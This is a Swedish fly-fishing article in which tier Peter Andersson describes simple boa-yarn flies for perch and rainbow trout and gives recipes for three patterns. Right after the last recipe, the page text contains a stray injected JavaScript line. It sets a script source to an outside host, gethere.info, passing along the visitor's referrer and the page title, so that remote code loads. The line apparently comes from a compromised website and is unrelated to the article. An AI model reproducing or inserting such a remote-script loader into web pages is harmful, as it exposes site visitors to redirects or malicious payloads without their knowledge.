Superenkla garnflugor

Flugbindaren Peter Andersson har utvecklat en serie garnflugor som funkar finemang på abborre

Jag träffade på flugan Boa Yarn Leach skapad av Rick Zieger till flugfiske efter de abborrsläktingar som allmänt kallas för panfish på internet. Eftersom jag gillar enkla flugor föll jag direkt och gav mig i väg till närmsta garnbutik för att köpa »Boa yarn«. Boagarnet, som finns i de flesta garnaffärer, har en platt kärna med hår åt ena sidan. Om du lindar kärnan platt mot krokskaftet med håret riktat bakåt får du en fin palmerhacklad fiskefluga lika enkelt sober som effektiv. Det finns även andra fabrikat som fungerar fint, se bara till att de är tillverkade på samma sätt med platt kärntråd som originalet. Rick Zieger binder även varianter med gummiben, metallkula med mera. Jag började binda originalet i diverse färger, till exempel en tonad färg från lila till guldgult på streamerkrok vilken visade sig utmärkt till abborren. Annars är svart en pålitlig färg för ädelfisken.

Skapandet går vidare. Jag har länge funderat på en bra imitation av de stora bredrumpade trollsländenymferna som är sådana fina munsbitar till storfisken. Lösningen var så enkel att det är irriterande att jag inte har kommit på den tidigare. Det var bara att lägga till ett par varv långt mjukt hackel framför garnkroppen för att imitera nymfens ben. Så var det klart och regnbågarna gillar den skarpt. Binder den mestadels i svart med grizzlyben. Det senaste nytillskottet i flugasken är att jag ändrade en gammal favorit, Big Hole Demon, till Boa Yarn Demon genom att ersätta originalets framkropp av chenille och hackel med boagarn. Blir en slank och fin fiskimitation med något bättre lyster än originalet. Gillas av abborren och regnbågen. Den ska även provas på öringen längs kusten vid första bästa tillfälle.

1. BOA YARN LEACH
Krok: Valfri streamer- eller våtflugekrok.
Bindtråd: Valfri.
Kropp: Boagarn eller likvärdigt.

2. BOA GARN NYMF
Krok: Våtflugekrok storlek 12 eller streamerkrok storlek 10.
Bindtråd: Svart.
Kropp: Svart boagarn.
Ben: Mjukt hackel, svart eller grizzlyfärgat.

3. BOA YARN DEMON
Krok: Streamerkrok.
Bindtråd: Valfri.
Stjärt: Hackelspetsar eller hackelfibrer av ungefär krokskaftets längd (själv gillar jag fibrer från topparna på påskfjäder för de är mjuka, fylliga och billiga).
Kropp: Bakre halvan av silvertinsel och främre halvan, huvudet, av boagarn eller likvärdigt.
Kommentar: Vad gäller färger, tänk spigg, elritsa, småabborre, attraktorfärger och annat som kan locka beroende på fisk, bytesfisk och vattnen.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;


MER FRÅN ALLTOMFLUGFISKE.SE

Sponsrad
Sponsrad